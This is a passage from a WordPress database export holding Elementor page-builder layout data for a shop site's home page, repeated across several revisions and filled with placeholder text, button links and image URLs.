\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7846,1399,'_elementor_page_assets','a:0:{}'),(7848,1400,'_elementor_edit_mode','builder'),(7849,1400,'_elementor_template_type','wp-page'),(7850,1400,'_elementor_version','3.7.6'),(7851,1400,'_wp_page_template','elementor_canvas'),(7852,1400,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":34.872},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.023},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.042999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.044},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7853,1400,'_elementor_page_assets','a:0:{}'),(7866,1402,'_elementor_edit_mode','builder'),(7867,1402,'_elementor_template_type','wp-page'),(7868,1402,'_elementor_version','3.7.6'),(7869,1402,'_wp_page_template','elementor_canvas'),(7870,1402,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":34.872},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.023},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.042999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.044},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 